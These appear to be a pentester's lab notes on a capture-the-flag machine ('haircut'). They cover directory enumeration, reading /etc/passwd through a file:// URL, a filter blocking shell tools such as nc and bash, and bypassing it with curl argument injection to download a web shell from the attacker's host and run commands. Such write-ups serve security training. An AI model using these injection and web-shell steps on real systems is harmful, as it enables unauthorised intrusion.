2 :80
$ gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.html (Status: 200) [Size: 144]
/uploads (Status: 301) [Size: 194] [--> http://10.10.10.24/uploads/]
/test.html (Status: 200) [Size: 223]
/hair.html (Status: 200) [Size: 141]
/exposed.php (Status: 200) [Size: 446]
http://10.10.10.24/exposed.php
Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html
| contains a form for input and loads the request URL
# http://localhost/../../../etc/passwd | http://localhost/../../etc/passwd
404 Not Found
# trying command injection
;ls
<> is not a good thing to put in a URL
# blacklisted chars
;
&
|
{
}
# $ < > are not blacklisted
# program running is curl
<empty>
Requesting Site...
curl: try 'curl --help' or 'curl --manual' for more information
# trying file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
maria:x:1000:1000:maria,,,:/home/maria:/bin/bash
file:///var/www/html/exposed.php
<span>
<?php
if(isset($_POST['formurl'])){
echo "<p>Requesting Site...</p>";
$userurl=$_POST['formurl'];
$naughtyurl=0;
$disallowed=array('%','!','|',';','python','nc','perl','bash','&','#','{','}','[',']');
foreach($disallowed as $naughty){
if(strpos($userurl,$naughty) !==false){
echo $naughty.' is not a good thing to put in a URL';
$naughtyurl=1;
}
}
if($naughtyurl==0){
echo shell_exec("curl ".$userurl." 2>&1");
}
}
?>
</span>
# noticing the command that is called is just curl <URL> 2>&1
trying http://10.10.16.7/web.php -o uploads/web.php
# web shell at
http://haircut.htb/uploads/web.php
CMD: whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
haircut
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Last updated